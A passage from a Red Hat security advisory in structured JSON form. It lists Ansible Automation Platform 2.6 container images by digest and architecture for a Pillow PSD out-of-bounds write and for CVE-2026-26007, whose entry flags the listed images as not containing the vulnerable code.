"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-26007",
"cwe": {
"id": "CWE-354",
"name": "Improper Validation of Integrity Check Value"
},
"discovery_date": "2026-02-10T22:01:01.036116+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438762"
